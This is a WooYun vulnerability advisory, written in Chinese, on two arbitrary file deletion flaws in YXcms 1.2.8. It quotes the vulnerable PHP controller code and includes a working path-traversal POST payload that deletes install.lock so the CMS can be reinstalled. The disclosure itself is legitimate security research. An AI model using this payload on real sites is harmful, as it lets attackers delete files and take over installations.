当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112273

漏洞标题:YXcms1.2.8两处任意文件删除可reinstall

相关厂商:yxcms.net

漏洞作者: zxx

提交时间:2015-05-11 10:51

修复时间:2015-08-09 10:54

公开时间:2015-08-09 10:54

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-14: 细节向第三方安全合作伙伴开放
2015-07-05: 细节向核心白帽子及相关领域专家公开
2015-07-15: 细节向普通白帽子公开
2015-07-25: 细节向实习白帽子公开
2015-08-09: 细节向公众公开

简要描述:

1.2.8

详细说明:

一处没有过滤,一处过滤失误
第一处:/protected/apps/member/controller/inforController.php

public function index()
{
$auth=$this->auth;
$id=$auth['id'];
if(!$this->isPost()){
$info=model('members')->find("id='{$id}'");
$this->info=$info;
$this->path=__ROOT__.'/upload/member/image/';
$this->twidth=config('HEAD_W');
$this->theight=config('HEAD_H');
$this->display();
}else{
if(!empty($_POST['email']) && !Check::email(trim($_POST['email']))) $this->error('邮箱格式错误~');
$data['nickname']=in(trim($_POST['nickname']));
$acc=model('members')->find("id!='{$id}' AND nickname='".$data['nickname']."'");
if(!empty($acc['nickname'])) $this->error('该昵称已经有人使用~');
if (empty($_FILES['headpic']['name']) === false){
$tfile=date("Ymd");
$imgupload= $this->upload($this->uploadpath.$tfile.'/',config('imgupSize'),'jpg,bmp,gif,png');
$imgupload->saveRule='thumb_'.time();
$imgupload->upload();
$fileinfo=$imgupload->getUploadFileInfo();
$errorinfo=$imgupload->getErrorMsg();
if(!empty($errorinfo)) $this->alert($errorinfo);
else{
if(!empty($_POST['oldheadpic'])){
$picpath=$this->uploadpath.$_POST['oldheadpic'];
if(file_exists($picpath)) @unlink($picpath); //修改个人资料时没有对$_POST['oldheadpic']参数进行过滤,可以传入../
}
$data['headpic']=$tfile.'/'.$fileinfo[0]['savename'];
}
}
$data['email']=in($_POST['email']);
$data['tel']=in($_POST['tel']);
$data['qq']=in($_POST['qq']);
model('members')->update("id='{$id}'",$data);
$info=model('members')->find("id='{$id}'");
if($info['headpic'] && !Check::url($info['headpic'])) $info['headpic']=__UPLOAD__.'/member/image/'.$info['headpic'];
$cookie_auth = $info['id'].'\t'.$info['groupid'].'\t'.$info['account'].'\t'.$info['nickname'].'\t'.$info['lastip'].'\t'.$info['headpic'];
set_cookie('auth',$cookie_auth,0);
$this->success('信息编辑成功~');
}
}


第二处:/protected/apps/member/controller/newsController.php 过滤失误

//封面图删除
public function delcover()
{
//文件保存目录
$id=in($_POST['id']);
$pic=in($_POST['pic']);
$pic=str_replace('./', '', $pic); //将./过滤为空,使用../..//将变成../
$data['picture']= $this->nopic;
if(model('news')->update("id='$id' and account='".$this->mesprefix.$this->auth['account']."'",$data)){
$picpath=$this->uploadpath.$pic;
echo $picpath;
if(file_exists($picpath)) @unlink($picpath);
echo 1;
}else echo '删除封面失败~';
}

漏洞证明:

POC1:

屏幕快照 2015-05-05 下午8.01.09.png


POC2:
http://localhost/index.php?r=member/news/delcover
POST:id=17&pic=../..//../..//../..//protected/apps/install/install.lock

屏幕快照 2015-05-05 下午7.55.00.png

屏幕快照 2015-05-05 下午7.55.32.png

修复方案:

过滤一下,其他地方截取后3位的检测方法不太好

版权声明:转载请注明来源 zxx@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-05-11 10:53

厂商回复:

谢谢关注

最新状态:

暂无